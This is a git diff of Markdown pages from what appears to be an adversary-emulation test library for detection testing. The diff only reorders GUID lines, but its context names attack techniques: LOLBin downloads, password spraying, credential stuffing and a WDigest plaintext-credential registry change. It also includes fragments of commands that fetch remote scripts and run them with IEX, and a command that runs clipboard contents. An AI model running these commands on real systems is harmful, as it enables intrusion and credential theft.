## Atomic Test #4 - scp remote file copy (pull) - -auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 - Utilize scp to perform a remote file copy (pull) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** b9d22b9a-9778-4426-abf0-568ea64e9c33 + + + #### Inputs: @@ -172,13 +180,15 @@ scp #{username}@#{remote_host}:#{remote_file} #{local_path}
## Atomic Test #5 - sftp remote file copy (push) - -auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e - Utilize sftp to perform a remote file copy (push) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** f564c297-7978-4aa9-b37a-d90477feea4e + + + #### Inputs: @@ -206,13 +216,15 @@ sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}'
## Atomic Test #6 - sftp remote file copy (pull) - -auto_generated_guid: 0139dba1-f391-405e-a4f5-f3989f2c88ef - Utilize sftp to perform a remote file copy (pull) + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 0139dba1-f391-405e-a4f5-f3989f2c88ef + + + #### Inputs: @@ -240,13 +252,15 @@ sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
## Atomic Test #7 - certutil download (urlcache) - -auto_generated_guid: dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 - Use certutil -urlcache argument to download a file from the web. Note - /urlcache also works! + **Supported Platforms:** Windows +**auto_generated_guid:** dd3b61dd-7bbc-48cd-ab51-49ad1a776df0 + + + #### Inputs: @@ -276,13 +290,15 @@ del #{local_path} >nul 2>&1
## Atomic Test #8 - certutil download (verifyctl) - -auto_generated_guid: ffd492e3-0455-4518-9fb1-46527c9f241b - Use certutil -verifyctl argument to download a file from the web. Note - /verifyctl also works! + **Supported Platforms:** Windows +**auto_generated_guid:** ffd492e3-0455-4518-9fb1-46527c9f241b + + + #### Inputs: @@ -316,14 +332,16 @@ Remove-Item "certutil-$(Get-Date -format yyyy_MM_dd)" -Force -Recurse -ErrorActi
## Atomic Test #9 - Windows - BITSAdmin BITS Download - -auto_generated_guid: a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b - This test uses BITSAdmin.exe to schedule a BITS job for the download of a file. This technique is used by Qbot malware to download payloads. + **Supported Platforms:** Windows +**auto_generated_guid:** a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b + + + #### Inputs: @@ -350,14 +368,16 @@ C:\Windows\System32\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{re
## Atomic Test #10 - Windows - PowerShell Download - -auto_generated_guid: 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 - This test uses PowerShell to download a payload. This technique is used by multiple adversaries and malware families. + **Supported Platforms:** Windows +**auto_generated_guid:** 42dc4460-9aa6-45d3-b1a6-3955d34e1fe8 + + + #### Inputs: @@ -387,13 +407,15 @@ Remove-Item #{destination_path} -Force -ErrorAction Ignore
## Atomic Test #11 - OSTAP Worming Activity - -auto_generated_guid: 2ca61766-b456-4fcf-a35a-1233685e1cad - OSTap copies itself in a specfic way to shares and secondary drives. This emulates the activity. + **Supported Platforms:** Windows +**auto_generated_guid:** 2ca61766-b456-4fcf-a35a-1233685e1cad + + + #### Inputs: @@ -423,14 +445,16 @@ popd
## Atomic Test #12 - svchost writing a file to a UNC path - -auto_generated_guid: fa5a2759-41d7-4e13-a19c-e8f28a53566f - svchost.exe writing a non-Microsoft Office file to a file with a UNC path. Upon successful execution, this will rename cmd.exe as svchost.exe and move it to `c:\`, then execute svchost.exe with output to a txt file. + **Supported Platforms:** Windows +**auto_generated_guid:** fa5a2759-41d7-4e13-a19c-e8f28a53566f + + + @@ -456,17 +480,19 @@ del C:\\svchost.exe >nul 2>&1
## Atomic Test #13 - Download a File with Windows Defender MpCmdRun.exe - -auto_generated_guid: 815bef8b-bf91-4b67-be4c-abe4c2a94ccc - Uses the Windows Defender to download a file from the internet (must have version 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 installed). The input arguments "remote_file" and "local_path" can be used to specify the download URL and the name of the output file. By default, the test downloads the Atomic Red Team license file to the temp directory. More info and how to find your version can be found here https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ + **Supported Platforms:** Windows +**auto_generated_guid:** 815bef8b-bf91-4b67-be4c-abe4c2a94ccc + + + #### Inputs: @@ -514,13 +540,15 @@ Write-Host "Windows Defender verion 4.18.2007.8-0, 4.18.2007.9, or 4.18.2009.9 m
## Atomic Test #14 - whois file download - -auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab - Download a remote file using the whois utility + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** c99a829f-0bb8-4187-b2c6-d47d1df74cab + + + #### Inputs: diff --git a/atomics/T1106/T1106.md b/atomics/T1106/T1106.md index 4f7c9b48..0e25b7fe 100644 --- a/atomics/T1106/T1106.md +++ b/atomics/T1106/T1106.md @@ -16,13 +16,15 @@ Adversaries may abuse these native API functions as a means of executing behavio
## Atomic Test #1 - Execution through API - CreateProcess - -auto_generated_guid: 99be2089-c52d-4a4a-b5c3-261ee42c8b62 - Execute program by leveraging Win32 API's. By default, this will launch calc.exe from the command prompt. + **Supported Platforms:** Windows +**auto_generated_guid:** 99be2089-c52d-4a4a-b5c3-261ee42c8b62 + + + #### Inputs: diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index c62f01f1..03513e36 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -33,13 +33,15 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
## Atomic Test #1 - Brute Force Credentials of all domain users via SMB - -auto_generated_guid: 09480053-2f98-4854-be6e-71ae5f672224 - Creates username and password files then attempts to brute force on remote host + **Supported Platforms:** Windows +**auto_generated_guid:** 09480053-2f98-4854-be6e-71ae5f672224 + + + #### Inputs: @@ -71,13 +73,15 @@ echo "Password!" >> #{input_file_passwords}
## Atomic Test #2 - Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) - -auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250 - Attempt to brute force domain user on a domain controller, via LDAP, with NTLM or Kerberos + **Supported Platforms:** Windows +**auto_generated_guid:** c2969434-672b-4ec8-8df0-bbb91f40e250 + + + #### Inputs: diff --git a/atomics/T1110.002/T1110.002.md b/atomics/T1110.002/T1110.002.md index 7157b87b..67d78ecd 100644 --- a/atomics/T1110.002/T1110.002.md +++ b/atomics/T1110.002/T1110.002.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Password Cracking with Hashcat - -auto_generated_guid: 6d27df5d-69d4-4c91-bc33-5983ffe91692 - Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against + **Supported Platforms:** Windows +**auto_generated_guid:** 6d27df5d-69d4-4c91-bc33-5983ffe91692 + + + #### Inputs: diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md index b5cb5bd3..b8450e15 100644 --- a/atomics/T1110.003/T1110.003.md +++ b/atomics/T1110.003/T1110.003.md @@ -33,16 +33,18 @@ In default environments, LDAP and Kerberos connection attempts are less likely t
## Atomic Test #1 - Password Spray all Domain Users - -auto_generated_guid: 90bc2e54-6c84-47a5-9439-0a2a92b4b175 - CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently. This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt. See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5 + **Supported Platforms:** Windows +**auto_generated_guid:** 90bc2e54-6c84-47a5-9439-0a2a92b4b175 + + + #### Inputs: @@ -79,15 +81,17 @@ PathToAtomicsFolder\T1110.003\src\parse_net_users.bat
## Atomic Test #2 - Password Spray (DomainPasswordSpray) - -auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b - Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain https://github.com/dafthack/DomainPasswordSpray + **Supported Platforms:** Windows +**auto_generated_guid:** 263ae743-515f-4786-ac7d-41ef3a0d4b2b + + + #### Inputs: @@ -113,15 +117,17 @@ IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb725
## Atomic Test #3 - Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) - -auto_generated_guid: f14d956a-5b6e-4a93-847f-0c415142f07d - Attempt to brute force all domain user with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users) + **Supported Platforms:** Windows +**auto_generated_guid:** f14d956a-5b6e-4a93-847f-0c415142f07d + + + #### Inputs: diff --git a/atomics/T1110.004/T1110.004.md b/atomics/T1110.004/T1110.004.md index 8f7114b7..fb33c74f 100644 --- a/atomics/T1110.004/T1110.004.md +++ b/atomics/T1110.004/T1110.004.md @@ -31,13 +31,15 @@ In addition to management services, adversaries may "target single sign-on (SSO)
## Atomic Test #1 - SSH Credential Stuffing From Linux - -auto_generated_guid: 4f08197a-2a8a-472d-9589-cd2895ef22ad - Using username,password combination from a password dump to login over SSH. + **Supported Platforms:** Linux +**auto_generated_guid:** 4f08197a-2a8a-472d-9589-cd2895ef22ad + + + #### Inputs: @@ -75,13 +77,15 @@ if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | g
## Atomic Test #2 - SSH Credential Stuffing From MacOS - -auto_generated_guid: d546a3d9-0be5-40c7-ad82-5a7d79e1b66b - Using username,password combination from a password dump to login over SSH. + **Supported Platforms:** macOS +**auto_generated_guid:** d546a3d9-0be5-40c7-ad82-5a7d79e1b66b + + + #### Inputs: diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index 119a4d22..1214c378 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md @@ -26,14 +26,16 @@ The Registry of a remote system may be modified to aid in execution of files as
## Atomic Test #1 - Modify Registry of Current User Profile - cmd - -auto_generated_guid: 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 - Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced. + **Supported Platforms:** Windows +**auto_generated_guid:** 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 + + +
@@ -57,15 +59,17 @@ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
## Atomic Test #2 - Modify Registry of Local Machine - cmd - -auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe - Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run. + **Supported Platforms:** Windows +**auto_generated_guid:** 282f929a-6bc5-42b8-bd93-960c3ba35afe + + + #### Inputs:
@@ -94,15 +98,17 @@ reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v S
## Atomic Test #3 - Modify registry to store logon credentials - -auto_generated_guid: c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 - Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping). Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. + **Supported Platforms:** Windows +**auto_generated_guid:** c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 + + +
@@ -126,17 +132,19 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
## Atomic Test #4 - Add domain to Trusted sites Zone - -auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57 - Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365. Upon execution, details of the new registry entries will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\. https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf + **Supported Platforms:** Windows +**auto_generated_guid:** cf447677-5a4e-4937-a82c-e47d254afd57 + + + #### Inputs:
@@ -171,14 +179,16 @@ Remove-item $key -Recurse -ErrorAction Ignore
## Atomic Test #5 - Javascript in registry - -auto_generated_guid: 15f44ea9-4571-4837-be9e-802431a7bfae - Upon execution, a javascript block will be placed in the registry for persistence. Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings. + **Supported Platforms:** Windows +**auto_generated_guid:** 15f44ea9-4571-4837-be9e-802431a7bfae + + +
@@ -202,14 +212,16 @@ Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Se
## Atomic Test #6 - Change Powershell Execution Policy to Bypass - -auto_generated_guid: f3a6cceb-06c9-48e5-8df8-8867a6814245 - Attackers need to change the powershell execution policy in order to run their malicious powershell scripts. They can either specify it during the execution of the powershell script or change the registry value for it. + **Supported Platforms:** Windows +**auto_generated_guid:** f3a6cceb-06c9-48e5-8df8-8867a6814245 + + + #### Inputs:
diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md
index a2cd69a4..fc466d2d 100644
--- a/atomics/T1113/T1113.md
+++ b/atomics/T1113/T1113.md
@@ -19,13 +19,15 @@
## Atomic Test #1 - Screencapture - -auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac - Use screencapture command to collect a full desktop screenshot + **Supported Platforms:** macOS +**auto_generated_guid:** 0f47ceb1-720f-4275-96b8-21f0562217ac + + + #### Inputs:
@@ -54,13 +56,15 @@ rm #{output_file}
## Atomic Test #2 - Screencapture (silent) - -auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 - Use screencapture command to collect a full desktop screenshot + **Supported Platforms:** macOS +**auto_generated_guid:** deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 + + + #### Inputs:
@@ -89,13 +93,15 @@ rm #{output_file}
## Atomic Test #3 - X Windows Capture - -auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac - Use xwd command to collect a full desktop screenshot and review file with xwud + **Supported Platforms:** Linux +**auto_generated_guid:** 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac + + + #### Inputs:
@@ -139,13 +145,15 @@ sudo #{package_installer}
## Atomic Test #4 - Capture Linux Desktop using Import Tool - -auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 - Use import command from ImageMagick to collect a full desktop screenshot + **Supported Platforms:** Linux +**auto_generated_guid:** 9cd1cccb-91e4-4550-9139-e20a586fcea1 + + + #### Inputs:
@@ -186,13 +194,15 @@ sudo apt-get -y install graphicsmagick-imagemagick-compat
## Atomic Test #5 - Windows Screencapture - -auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 - Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour + **Supported Platforms:** Windows +**auto_generated_guid:** 3c898f62-626c-47d5-aad2-6de873d69153 + + + #### Inputs:
diff --git a/atomics/T1114.001/T1114.001.md b/atomics/T1114.001/T1114.001.md
index 55f5e0c4..e641d3bc 100644
--- a/atomics/T1114.001/T1114.001.md
+++ b/atomics/T1114.001/T1114.001.md
@@ -12,16 +12,18 @@ Outlook stores data locally in offline data files with an extension of .ost. Out
## Atomic Test #1 - Email Collection with PowerShell Get-Inbox - -auto_generated_guid: 3f1b5096-0139-4736-9b78-19bcb02bb1cb - Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration. Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file. Note: Outlook is required, but no email account necessary to produce artifacts. + **Supported Platforms:** Windows +**auto_generated_guid:** 3f1b5096-0139-4736-9b78-19bcb02bb1cb + + + #### Inputs:
diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md
index 4967809c..447bfa64 100644
--- a/atomics/T1115/T1115.md
+++ b/atomics/T1115/T1115.md
@@ -18,13 +18,15 @@ In Windows, Applications can access clipboard data by using the Windows API.(Cit
## Atomic Test #1 - Utilize Clipboard to store or execute commands from - -auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 - Add data to clipboard to copy off or execute commands from. + **Supported Platforms:** Windows +**auto_generated_guid:** 0cd14633-58d4-4422-9ede-daa2c9474ae7 + + +
@@ -50,13 +52,15 @@ del %temp%\T1115.txt >nul 2>&1
## Atomic Test #2 - Execute Commands from Clipboard using PowerShell - -auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 - Utilize PowerShell to echo a command to clipboard and execute it + **Supported Platforms:** Windows +**auto_generated_guid:** d6dc21af-bec9-4152-be86-326b6babd416 + + +
@@ -77,13 +81,15 @@ Get-Clipboard | iex
## Atomic Test #3 - Execute commands from clipboard - -auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff - Echo a command to clipboard and execute it + **Supported Platforms:** macOS +**auto_generated_guid:** 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff + + +
@@ -104,13 +110,15 @@ $(pbpaste)
## Atomic Test #4 - Collect Clipboard Data via VBA - -auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 - This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt + **Supported Platforms:** Windows +**auto_generated_guid:** 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 + + + #### Inputs:
diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md
index 90f0a4d8..f85f5632 100644
--- a/atomics/T1119/T1119.md
+++ b/atomics/T1119/T1119.md
@@ -18,14 +18,16 @@ This technique may incorporate use of other techniques such as [File and Directo
## Atomic Test #1 - Automated Collection Command Prompt - -auto_generated_guid: cb379146-53f1-43e0-b884-7ce2c635ff5b - Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection to see what was collected. + **Supported Platforms:** Windows +**auto_generated_guid:** cb379146-53f1-43e0-b884-7ce2c635ff5b + + +
@@ -51,14 +53,16 @@ del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
## Atomic Test #2 - Automated Collection PowerShell - -auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 - Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection to see what was collected. + **Supported Platforms:** Windows +**auto_generated_guid:** 634bd9b9-dc83-4229-b19f-7f83ba9ad313 + + +
@@ -83,14 +87,16 @@ Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | O
## Atomic Test #3 - Recon information for export with PowerShell - -auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 - collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt to see what was collected. + **Supported Platforms:** Windows +**auto_generated_guid:** c3f6d794-50dd-482f-b640-0384fbb7db26 + + +
@@ -118,14 +124,16 @@ Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
## Atomic Test #4 - Recon information for export with Command Prompt - -auto_generated_guid: aa1180e2-f329-4e1e-8625-2472ec0bfaf3 - collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt to see what was collected. + **Supported Platforms:** Windows +**auto_generated_guid:** aa1180e2-f329-4e1e-8625-2472ec0bfaf3 + + +
diff --git a/atomics/T1120/T1120.md b/atomics/T1120/T1120.md
index a1d5580a..18669e5e 100644
--- a/atomics/T1120/T1120.md
+++ b/atomics/T1120/T1120.md
@@ -10,13 +10,15 @@
## Atomic Test #1 - Win32_PnPEntity Hardware Inventory - -auto_generated_guid: 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 - Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity + **Supported Platforms:** Windows +**auto_generated_guid:** 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 + + +
diff --git a/atomics/T1123/T1123.md b/atomics/T1123/T1123.md
index ea593f6a..4c71401f 100644
--- a/atomics/T1123/T1123.md
+++ b/atomics/T1123/T1123.md
@@ -12,13 +12,15 @@ Malware or scripts may be used to interact with the devices through an available
## Atomic Test #1 - using device audio capture commandlet - -auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95 - [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) + **Supported Platforms:** Windows +**auto_generated_guid:** 9c3ad250-b185-4444-b5a9-d69218a10c95 + + +
diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md
index 13cc9567..6c47ab1a 100644
--- a/atomics/T1124/T1124.md
+++ b/atomics/T1124/T1124.md
@@ -16,13 +16,15 @@ This information could be useful for performing other techniques, such as execut
## Atomic Test #1 - System Time Discovery - -auto_generated_guid: 20aba24b-e61f-4b26-b4ce-4784f763ca20 - Identify the system time. Upon execution, the local computer system time and timezone will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 20aba24b-e61f-4b26-b4ce-4784f763ca20 + + + #### Inputs:
@@ -48,13 +50,15 @@ w32tm /tz
## Atomic Test #2 - System Time Discovery - PowerShell - -auto_generated_guid: 1d5711d6-655c-4a47-ae9c-6503c74fa877 - Identify the system time via PowerShell. Upon execution, the system time will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 1d5711d6-655c-4a47-ae9c-6503c74fa877 + + +
diff --git a/atomics/T1127.001/T1127.001.md b/atomics/T1127.001/T1127.001.md
index 750799b6..5175ec9f 100644
--- a/atomics/T1127.001/T1127.001.md
+++ b/atomics/T1127.001/T1127.001.md
@@ -14,13 +14,15 @@ Adversaries can abuse MSBuild to proxy execution of malicious code. The inline t
## Atomic Test #1 - MSBuild Bypass Using Inline Tasks (C#) - -auto_generated_guid: 58742c0f-cb01-44cd-a60b-fb26e8871c93 - Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. + **Supported Platforms:** Windows +**auto_generated_guid:** 58742c0f-cb01-44cd-a60b-fb26e8871c93 + + + #### Inputs:
@@ -60,13 +62,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - MSBuild Bypass Using Inline Tasks (VB) - -auto_generated_guid: ab042179-c0c5-402f-9bc8-42741f5ce359 - Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. + **Supported Platforms:** Windows +**auto_generated_guid:** ab042179-c0c5-402f-9bc8-42741f5ce359 + + + #### Inputs:
diff --git a/atomics/T1132.001/T1132.001.md b/atomics/T1132.001/T1132.001.md
index d0c7e284..f3c396c8 100644
--- a/atomics/T1132.001/T1132.001.md
+++ b/atomics/T1132.001/T1132.001.md
@@ -10,13 +10,15 @@
## Atomic Test #1 - Base64 Encoded data. - -auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 - Utilizing a common technique for posting base64 encoded data. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 + + + #### Inputs:
diff --git a/atomics/T1133/T1133.md b/atomics/T1133/T1133.md
index 8129da91..24b4ad2b 100644
--- a/atomics/T1133/T1133.md
+++ b/atomics/T1133/T1133.md
@@ -14,13 +14,15 @@ Access may also be gained through an exposed service that doesn’t require auth
## Atomic Test #1 - Running Chrome VPN Extensions via the Registry 2 vpn extension - -auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 - Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list + **Supported Platforms:** Windows +**auto_generated_guid:** 4c8db261-a58b-42a6-a866-0a294deedde4 + + + #### Inputs:
diff --git a/atomics/T1134.001/T1134.001.md b/atomics/T1134.001/T1134.001.md
index 1a8ba916..958ceb8c 100644
--- a/atomics/T1134.001/T1134.001.md
+++ b/atomics/T1134.001/T1134.001.md
@@ -14,16 +14,18 @@ An adversary may do this when they have a specific, existing process they want t
## Atomic Test #1 - Named pipe client impersonation - -auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966 - Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ + **Supported Platforms:** Windows +**auto_generated_guid:** 90db9e27-8e7c-4c04-b602-a45927884966 + + +
@@ -44,14 +46,16 @@ IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f
## Atomic Test #2 - `SeDebugPrivilege` token duplication - -auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0 - Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). + **Supported Platforms:** Windows +**auto_generated_guid:** 34f0a430-9d04-4d98-bcb5-1989f14719f0 + + +
diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md
index 93157b9e..c2fa3995 100644
--- a/atomics/T1134.004/T1134.004.md
+++ b/atomics/T1134.004/T1134.004.md
@@ -22,17 +22,19 @@ Explicitly assigning the PPID may also enable elevated privileges given appropri
## Atomic Test #1 - Parent PID Spoofing using PowerShell - -auto_generated_guid: 069258f4-2162-46e9-9a25-c9c6c56150d2 - This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process. Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and calc.exe will be launched. Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1) + **Supported Platforms:** Windows +**auto_generated_guid:** 069258f4-2162-46e9-9a25-c9c6c56150d2 + + + #### Inputs:
@@ -81,13 +83,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process - -auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25 - Spawns a powershell.exe process as a child of the current process. + **Supported Platforms:** Windows +**auto_generated_guid:** 14920ebd-1d61-491a-85e0-fe98efe37f25 + + + #### Inputs:
@@ -128,13 +132,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process - -auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb - Spawns a notepad.exe process as a child of the current process. + **Supported Platforms:** Windows +**auto_generated_guid:** cbbff285-9051-444a-9d17-c07cd2d230eb + + + #### Inputs:
@@ -174,13 +180,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe - -auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591 - Spawnd a process as a child of the first accessible svchost.exe process. + **Supported Platforms:** Windows +**auto_generated_guid:** e9f2b777-3123-430b-805d-5cedc66ab591 + + + #### Inputs:
@@ -220,13 +228,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #5 - Parent PID Spoofing - Spawn from New Process - -auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db - Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. + **Supported Platforms:** Windows +**auto_generated_guid:** 2988133e-561c-4e42-a15f-6281e6a9b2db + + + #### Inputs:
diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md
index 1bd8f520..a45e078c 100644
--- a/atomics/T1135/T1135.md
+++ b/atomics/T1135/T1135.md
@@ -22,13 +22,15 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik
## Atomic Test #1 - Network Share Discovery - -auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 - Network Share Discovery + **Supported Platforms:** macOS +**auto_generated_guid:** f94b5ad9-911c-4eff-9718-fd21899db4f7 + + + #### Inputs:
@@ -55,13 +57,15 @@ showmount #{computer_name}
## Atomic Test #2 - Network Share Discovery - linux - -auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae - Network Share Discovery using smbstatus + **Supported Platforms:** Linux +**auto_generated_guid:** 875805bc-9e86-4e87-be86-3a5527315cae + + + #### Inputs:
@@ -99,14 +103,16 @@ sudo #{package_installer}
## Atomic Test #3 - Network Share Discovery command prompt - -auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb - Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host Upon execution avalaible network shares will be displayed in the powershell session + **Supported Platforms:** Windows +**auto_generated_guid:** 20f1097d-81c1-405c-8380-32174d493bbb + + + #### Inputs:
@@ -131,14 +137,16 @@ net view \\#{computer_name}
